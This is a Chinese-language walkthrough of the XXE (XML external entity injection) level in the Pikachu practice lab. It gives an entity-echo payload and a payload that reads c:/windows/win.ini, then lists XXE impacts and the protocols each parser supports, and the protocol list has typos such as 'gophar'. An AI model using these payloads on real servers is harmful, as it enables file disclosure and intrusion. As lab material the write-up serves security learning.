靶场:pikachu
环境:
系统:Windows10
服务器:PHPstudy2018
靶场:pikachu
关卡提示说:这是一个接收xml数据的api
常用的Payload
回显
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe "XXE" > ]>
<foo>&xxe;</foo>
执行结果
查看系统文件内容
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" > ]>
<foo>&xxe;</foo>
执行结果
XXE的危害:
文件读取
内网主机扫描
端口探测
远程代码执行
XXE漏洞可利用的协议:
ilbxml2=file/http/ftp
PHP=file、http、ftp、php、compress.zlib、compress.bzip2、data、glob、phar
Java=http、https、ftp、file、jar、netdoc、mailto、gophar
NET=file、http、https、ftp
概述
XXE -"xml external entity injection"
既"xml外部实体注入漏洞"。
概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题"
也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。
本站资源均来自互联网,仅供研究学习,禁止违法使用和商用,产生法律纠纷本站概不负责!如果侵犯了您的权益请与我们联系!
转载请注明出处: 免费源码网-免费的源码资源网站 » pikachu XXE(XML外部实体注入)通关
发表评论 取消回复